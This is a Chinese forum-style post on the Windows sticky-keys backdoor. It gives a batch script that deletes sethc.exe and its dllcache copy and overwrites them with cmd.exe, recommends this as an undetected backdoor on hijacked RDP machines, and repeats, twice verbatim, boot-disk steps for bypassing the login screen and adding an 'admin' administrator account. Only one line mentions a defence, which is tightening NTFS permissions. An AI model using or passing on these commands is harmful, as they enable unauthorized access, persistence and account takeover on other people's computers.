粘滞键漏洞,按5下shift后,windows就执行了system32下的sethc.exe
Windows的粘滞键。是按5下shift后,windows就执行了system32下的sethc.exe。即使在3389中,都可以弹出!!
它本来是为不方便按组合键的人设计的。 如果我们把那个sethc.exe替换成我们想要的其它文件,比如说cmd.exe,那么就可以用cmd命令了.
其实写的批处理就可以解决了 又不麻烦
@echo off
del /q %systemroot%\system32\dllcache\sethc.exe
del /q %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe
我把它保存为5shift.bat。当我们运行它的时候,sethc.exe 就被换成了改了名的cmd.exe了。
可能由于cmd也是系统文件,所以替换是并没有弹出文件保护。呵呵。
个人感觉这个后门非常实用(特别是3389肉鸡!)。哪个管理员会考虑到这种后门呢
然后你就可以创建用户了
net user [UserName [Password | *] [options] [/domain]
net user [UserName {Password | *} /add [options] [/domain]
net user [UserName [/delete] [/domain]
[color=Red][b]把sethc.exe文件的NTFS权限设置一下就安全了.[/b][/color]
用shift键破解windows的登录密码.
首先用DOS盘启动.然后转到c:\windows\system32\下面.输入如下命令:
copy sethc.exe sethc2.exe 备份粘滞键文件
copy cmd.exe sethc.exe 用cmd.exe覆盖sethc.exe
然后重启.当需要输入密码的时候按5下shift就打开cmd窗口,然后输入如下密码:
net user admin admin /add 添加admin用户,密码是admin
net localgroup administrators admin /add 提升为超级管理员
首先用DOS盘启动.然后转到c:\windows\system32\下面.输入如下命令:
copy sethc.exe sethc2.exe 备份粘滞键文件
copy cmd.exe sethc.exe 用cmd.exe覆盖sethc.exe
然后重启.当需要输入密码的时候按5下shift就打开cmd窗口,然后输入如下密码:
net user admin admin /add 添加admin用户,密码是admin
net localgroup administrators admin /add 提升为超级管理员
